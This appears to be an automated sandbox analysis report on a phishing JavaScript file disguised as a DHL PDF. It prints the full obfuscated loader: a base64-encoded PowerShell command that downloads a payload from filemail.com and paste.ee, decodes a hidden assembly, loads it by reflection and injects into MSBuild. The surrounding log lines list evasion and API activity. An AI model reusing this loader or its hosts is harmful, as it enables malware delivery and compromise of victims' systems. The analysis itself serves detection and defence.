dotnetmemberrefresolveexceptionmicrosoft.win32.taskschedulertaskcompatibilityentrydnlib.threadingenumerableiteratealldelegate`1dnlib.dotnet.mdridlistdnlib.dotnet.resourcesresourcereadermicrosoft.win32.taskschedulertaskdefinitiondnlib.dotnet.emitcodednlib.dotnetcmodreqdsigdnlib.dotnet.pdbpdbimpltypednlib.utilsilazylist`1dnlib.dotnet.emitflowcontroldnlib.dotnetleafsigdnlib.dotnetcanamedargumentdnlib.peimagefileheaderdnlib.dotnetisignaturereaderhelperdnlib.dotnet.mdheaptypednlib.dotnetvaluearraysigdnlib.dotnettypedefuserdnlib.dotnet.writerimdtablednlib.dotnet.resourcesresourcedatacreatordnlib.dotnet.mdrawmodulerefrowdnlib.dotnet.writercor20headeroptionsdnlib.dotnettypesigdnlib.dotnetalltypeshelper<>c__5`1microsoft.win32.taskschedulermonthlytriggerdnlib.dotnetmethoddefuserdnlib.dotnet.mdmetadataheaderdnlib.dotnet.emitopcodednlib.dotnetihassemanticdnlib.dotnetinterfaceimpldnlib.dotnetitokenoperanddnlib.dotnetidnlibdefmicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetfullnamecreatordnlib.dotnetimethoddecrypterdnlib.dotnet.mdrawrowequalitycomparerdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduleritriggerdelaydnlib.dotnetpropertysigdnlib.dotnetassemblyresolverdnlib.dotnetstrongnamesignerdnlib.dotnetfixedarraymarshaltypednlib.dotnet.pdbpdbscope source: powershell.exe, 00000002.00000002.2510865192.00007FF8488CC000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: `1dnlib.dotnetstandalonesiguserdnlib.dotnetihasdeclsecuritydnlib.dotnetutf8stringequalitycomparerdnlib.dotnet.pdbpdbstatednlib.dotnet.writermetadataheaderoptionsdnlib.dotnet.mdrawconstantrowdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulertaskprincipaldnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdbisymbolwriter2 source: powershell.exe, 00000002.00000002.2510865192.00007FF8488CC000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dnlib.pepeimagemicrosoft.win32.taskschedulerregistrationtriggermicrosoft.win32.taskschedulerdaysoftheweekmicrosoft.win32.taskschedulertaskrunflagsdnlib.dotnet.mdrawparamptrrowdnlib.dotnet.writerichunkdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawenclogrowmicrosoft.win32.taskschedulertaskeventenumeratordnlib.dotnet.writericustomattributewriterhelperdnlib.peiimageoptionalheaderdnlib.dotnet.writermodulewriterdnlib.threadingthreadsafelistcreatordnlib.dotnet.mdrawfieldrvarowdnlib.dotnet.writerhotheap20dnlib.dotnet.mdcolumnsizednlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnet.writerdeclsecuritywriterconnectiontokendnlib.dotnet.writeruniquechunklist`1microsoft.win32.taskschedulertaskrunleveldnlib.dotnettypespecdnlib.dotnet.mdrawimplmaprowdnlib.dotnet.writermodulewriteroptionsdnlib.threadingextensionsdnlib.peipeimagednlib.dotnetinvalidkeyexceptiondnlib.dotnetfileattributesmicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnet.writerhotheap40dnlib.dotnetmodulerefdnlib.dotnetsigcomparerdnlib.dotnet.writermetadatadnlib.dotnet.pdbsequencepointdnlib.dotnet.pdb.managedpdbexceptiondnlib.peimagentheadersdnlib.pemachinednlib.peimageoptionalheader64dnlib.dotnettypedefdnlib.dotnetvaluetypesigdnlib.dotnetbytearrayequalitycomparerdnlib.dotnetpropertydefuserdnlib.dotnet.writertablesheapdnlib.dotnet.mdrawmemberrefrowdnlib.dotnet.writerhottablednlib.dotnetconstantdnlib.dotnetassemblydefuserdnlib.dotnetmodulerefuserdnlib.dotnetexportedtypednlib.iofileoffsetdnlib.dotnet.mdrawfieldptrrowdnlib.dotnet.writerimportaddresstablednlib.dotnet.mdrawmethodptrrowdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.emitmethodutilsdnlib.dotnetcallingconventionsigdnlib.peimageoptionalheader32dnlib.dotnet.emitiinstructionoperandresolverdnlib.dotnetcustomattributecollectionmicrosoft.win32.taskschedulertsnotsupportedexceptiondnlib.dotnetitypednlib.dotnettypedeforrefsigdnlib.w32resourcesresourcedirectoryuserdnlib.dotnet.emitinstructionprintermicrosoft.win32.taskschedulerwildcardmicrosoft.win32.taskschedulercustomtriggerdnlib.w32resourcesresourcedirectorypemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnet.mdcodedtokendnlib.dotnetassemblynameinfodnlib.dotnet.emitstackbehaviourmicrosoft.win32.taskschedulertaskstatednlib.dotnet.mdrawmodulerowdnlib.dotnet.pdb.dssisymunmanageddocumentwritermicrosoft.win32.taskschedulertaskcompatibilitydnlib.dotnet.emitinvalidmethodexceptiondnlib.dotnetnullresolverdnlib.dotnetdeclsecuritydnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnet.mdrawcustomattributerowdnlib.dotnet.resourcesresourceelementdnlib.dotnet.writerrelocdirectorydnlib.w32resourceswin32resourcespednlib.dotnetsigcompareroptionsdnlib.dotnet.mdrawmethodimplrowdnlib.dotnetsafearraymarshaltypednlib.dotnet.mdrawclasslayoutrowdnlib.dotnet.writerpeheadersoptionsmicrosoft.win32.taskschedulernamedvaluecollecti
          Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000002.00000002.2510865192.00007FF8488CC000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: `1taskprincipalprivilegesenumeratordnlib.dotnetifullnamemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdmdheaderruntimeversionmicrosoft.win32.taskschedulerrunningtaskcollectiondnlib.dotnetframeworkredirectelemdnlib.dotnet.emitistringresolverdnlib.dotnet.writernativemodulewriteroptionsdnlib.dotnet.pdb.managedpdbreadermicrosoft.win32.taskschedulertaskfoldercollectiondnlib.dotnetcallingconventionmicrosoft.win32.taskschedulertaskfoldersnapshotdnlib.iotoolsdnlib.dotnetiassemblydnlib.dotnetparamdefuserdnlib.dotnet.mdrawdeclsecurityrowdnlib.dotnet.writernativemodulewriterdnlib.dotnetmethodbasesig<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cmicrosoft.win32.taskschedulerrepetitionpatterndnlib.dotnetiassemblyreffindermicrosoft.win32.taskschedulericalendartriggerdnlib.dotnetmanifestresourcednlib.dotnet.writerimportdirectorymicrosoft.win32.taskschedulertaskservicednlib.dotnet.mdrawpropertymaprowmicrosoft.win32.taskschedulertaskinstancespolicymicrosoft.win32.taskscheduleritaskhandlerdnlib.dotnetparameterdnlib.dotnetitypedeffinderdnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerboottriggerdnlib.dotnet.mdrawgenericparamrowdnlib.dotnet.writerimetadatalistenerdnlib.dotneteventequalitycomparerdnlib.dotnet.mdcolumninfodnlib.dotnetfieldsigdnlib.ioiimagestreamdnlib.threadinglistiteratedelegate`1dnlib.dotnetassemblynamecomparerflagsdnlib.dotnet.mdrawmethodsemanticsrowdnlib.dotnetpublickeydnlib.dotnetgenericsig source: powershell.exe, 00000002.00000002.2510865192.00007FF8488CC000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dnlib.dotnet.pdbsymbolwritercreator source: powershell.exe, 00000002.00000002.2512100355.00007FF848950000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000002.00000002.2510865192.00007FF8488CC000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dnlib.dotnetscopetypednlib.dotnet.writerguidheapdnlib.dotnet.writertablesheapoptionsdnlib.dotnetgenericparamcontextdnlib.dotnetresourcetypednlib.dotnet.writerstrongnamesignaturednlib.dotnetifullnamecreatorhelperdnlib.dotnetvtablednlib.dotnetrawmarshaltypednlib.dotnet.pdbimage_debug_directorydnlib.dotnet.emitopcodetypednlib.dotnet.writerheapbasednlib.dotnet.mdmdtablednlib.dotnetfieldequalitycomparerdnlib.dotnetdeclsecurityreaderdnlib.dotnetimethoddnlib.dotnetarraymarshaltypednlib.dotnetityperesolver source: powershell.exe, 00000002.00000002.2512100355.00007FF848950000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000002.00000002.2452741154.0000016F1101B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2502322189.0000016F7E3F0000.00000004.08000000.00040000.00000000.sdmp

          Data Obfuscation

          Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell");var whiteouts = "cG93ZXJzaGVsbC5leGUgLUNvbW1hbmQgIiRVVWNScENMR21MTGRaS0xHTFpDaC??????????????9ICcjeCMubW9uL3NzYy9zci5tYXJvbGthI3MvLzpzcCMjaCc7JGtodUdmV0tjTENmQktQanJHV1RvID0gJFVVY1JwQ0xHbUxMZFpLTEdMWkNoIC1yZXBsYWNlICcjJywgJ3QnOyRCb2tTQm1jbVdXdHpXZXZXYW9xeC??????????????9ICdodHRwczovLzMwMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PW5JeF81VDBMeEhPQmppbE5iOUNSdmlhYlBqclcyZGxDLUx4ZU9kSlBGX1pfMU1QNkN1UUJTNUtjcHRBJnBrX3ZpZD0zNDI4MDNkMWNjNGUzYjgwMTczOTM1OTIwM2I1ZmU5ZCc7JHFrb3FHTFdwV2xlUEdMVGJHV0tpID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskVXRyR0dMemVXWmFpVUtMQUxja0sgPS??????????????kcWtvcUdMV3BXbGVQR0xUYkdXS2kuRG93bmxvYWREYXRhKCRCb2tTQm1jbVdXdHpXZXZXYW9xeCk7JEt6bmZiaExBS1dlaXhiaUtPTG1mID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJFV0ckdHTHplV1phaVVLTEFMY2tLKTskcHFHbUdKaENVZEhQVFdvTkd6b2kgPS??????????????nPDxCQVNFNjRfU1RBUlQ+Pic7JGZrYnRLaWNxV1VLdWNLWmZQc0daID0gJzw8QkFTRTY0X0VORD4+JzskSVdramlwTHJrS3ptTExaVFduQVogPS??????????????kS3puZmJoTEFLV2VpeGJpS09MbWYuSW5kZXhPZigkcHFHbUdKaENVZEhQVFdvTkd6b2kpOyRrTHFoa2tsb0xRbmxwQUFXdFVmYy??????????????9ICRLem5mYmhMQUtXZWl4YmlLT0xtZi5JbmRleE9mKCRma2J0S2ljcVdVS3VjS1pmUHNHWik7JElXa2ppcExya0t6bUxMWlRXbkFaIC1nZS??????????????wIC1hbmQgJGtMcWhra2xvTFFubHBBQVd0VWZjIC1ndC??????????????kSVdramlwTHJrS3ptTExaVFduQVo7JElXa2ppcExya0t6bUxMWlRXbkFaICs9ICRwcUdtR0poQ1VkSFBUV29OR3pvaS5MZW5ndGg7JFdaV0NpeEtHcUxqV0xLQWJsbldiID0gJGtMcWhra2xvTFFubHBBQVd0VWZjIC0gJElXa2ppcExya0t6bUxMWlRXbkFaOyRCcWZia1BtaUdLUFdtS054bENDUi??????????????9ICRLem5mYmhMQUtXZWl4YmlLT0xtZi5TdWJzdHJpbmcoJElXa2ppcExya0t6bUxMWlRXbkFaLC??????????????kV1pXQ2l4S0dxTGpXTEtBYmxuV2IpOyRpenBkY09OY2F1V1BmY3p1V1pOUy??????????????9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJEJxZmJrUG1pR0tQV21LTnhsQ0NSKTskR3RVTE5PS2hsY2lvdXRidUFMa3??????????????gPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRpenBkY09OY2F1V1BmY3p1V1pOUyk7JGFQb3pXR3VXUGZrY3pkcEtTcWRLID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJykuSW52b2tlKCRudWxsLCBbb2JqZWN0W11dIE??????????????oJGtodUdmV0tjTENmQktQanJHV1RvLCcnLCcnLCcnLCdNU0J1aWxkJywnJywnJywnJywnJywnQzpcUHJvZ3JhbURhdGFcJywnbWFybHknLCdqcycsJzEnLCcxJywncGVzc2FyaWVzJykpIg==";whiteouts = whiteouts.replace(/??????????????/g, "A");var balafon = spiritist.decode(whiteouts);chamade.Run(balafon, 0, false);IHost.CreateObject("Scripting.FileSystemObject");IFileSystem3.CreateTextFile("Z:\syscalls\3472.js.csv");ITextStream.WriteLine(" entry:44784 f:Salesians a0:%22h%C3%A0%C2%AF%E2%80%94%C3%82%C2%BB%C3%9E%C2%A0%C3%A2%C2%A4%C2%B7%C3%A2%C2%A0%C2%A3%C3%A2%C2%AA%C2%B8%C3%A2%C2%81%C2%A8%C3%85%C2%9D%C3%9F%C2%AB%C3%A2%E2%84%A2%C2%9D%C3%A2%C2%B4%C6%92%C3%A0%C2%AE%");ITextStream.WriteLine(" exec:37410 f:Salesians");ITextStream.WriteLine(" exit:44784 f:Salesians r:%22https%3A%2F%2Fpaste.ee%2Fd%2FFsssIAil%22");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" entry:44779 o: f:open a0:%22GET%22 a1:%22https%3A%2F%2Fpaste.ee%2Fd%2FFsssIAil%22 a2:false");IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/FsssIAil", "false");I
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 8_2_0041A8DA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF84868752B push ebx; iretd 2_2_00007FF84868756A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF8486800BD pushad ; iretd 2_2_00007FF8486800C1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_004000D8 push es; iretd 8_2_004000D9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0040008C push es; iretd 8_2_0040008D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_004542E6 push ecx; ret 8_2_004542F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0045B4FD push esi; ret 8_2_0045B506
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00432BD6 push ecx; ret 8_2_00432BE9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00454C08 push eax; ret 8_2_00454C26
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_004063C6 ShellExecuteW,URLDownloadToFileW, 8_2_004063C6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 8_2_00418A00

          Hooking and other Techniques for Hiding and Protection

          Source: Possible double extension: pdf.js Static PE information: DHL RPA GRBP Template.PDF.js
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 8_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 8_2_0041A8DA
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 8_2_0040E18D Sleep,ExitProcess, 8_2_0040E18D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 8_2_004186FE
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4615
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5211
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Window / User API: threadDelayed 766
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Window / User API: threadDelayed 8718
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Window / User API: foregroundWindowGot 1764
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6568 | Thread sleep time: -16602069666338586s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2132 | Thread sleep count: 244 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2132 | Thread sleep time: -122000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4424 | Thread sleep count: 766 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4424 | Thread sleep time: -2298000s >= -30000s
